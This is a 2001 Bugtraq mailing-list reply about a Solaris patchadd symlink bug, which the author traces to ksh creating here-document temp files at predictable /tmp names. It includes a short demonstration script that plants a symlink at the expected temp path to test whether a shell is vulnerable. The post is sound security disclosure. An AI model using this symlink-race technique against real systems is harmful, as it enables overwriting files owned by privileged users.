[22437] in bugtraq
Re: Solaris Patchadd symlink exploit.
daemon@ATHENA.MIT.EDU (Paul Szabo)
Mon Aug 27 17:43:17 2001
Date: Tue, 28 Aug 2001 07:06:08 +1000 (EST)
From: psz@maths.usyd.edu.au (Paul Szabo)
Message-Id: <200108272106.f7RL68V400699@milan.maths.usyd.edu.au>
To: bugtraq@securityfocus.com, lwc@Vapid.dhs.org
> Here is an exploit to an old bug for patchadd in Solaris. ...
> #See BID http://www.securityfocus.com/bid/2127
The bug is not in the patchadd script, but in the Korn shell ksh that
creates "here documents" insecurely.
Demonstration (ksh is vulnerable if the size of silly.1 is changed):
#!/bin/ksh -x
touch /tmp/silly.1
ln -s /tmp/silly.1 /tmp/sh$$.1
ls -l /tmp/silly.* /tmp/sh$$.*
cat <<EOF
Just some short text
EOF
ls -l /tmp/silly.* /tmp/sh$$.*
rm /tmp/silly.* /tmp/sh$$.*
Note that there is a similar bug in the Bourne shell sh. For a historical
perspective see articles:
http://www.securityfocus.com/templates/archive.pike?list=1&msg=200011230225.NAA19716@milan.maths.usyd.edu.au
http://www.securityfocus.com/templates/archive.pike?list=1&msg=200012190800.TAA05385@milan.maths.usyd.edu.au
http://www.securityfocus.com/templates/archive.pike?list=1&msg=200012202213.JAA03182@milan.maths.usyd.edu.au
http://www.securityfocus.com/templates/archive.pike?list=1&msg=200012202211.JAA25620@milan.maths.usyd.edu.au
Cheers,
Paul Szabo - psz@maths.usyd.edu.au http://www.maths.usyd.edu.au:8000/u/psz/
School of Mathematics and Statistics University of Sydney 2006 Australia
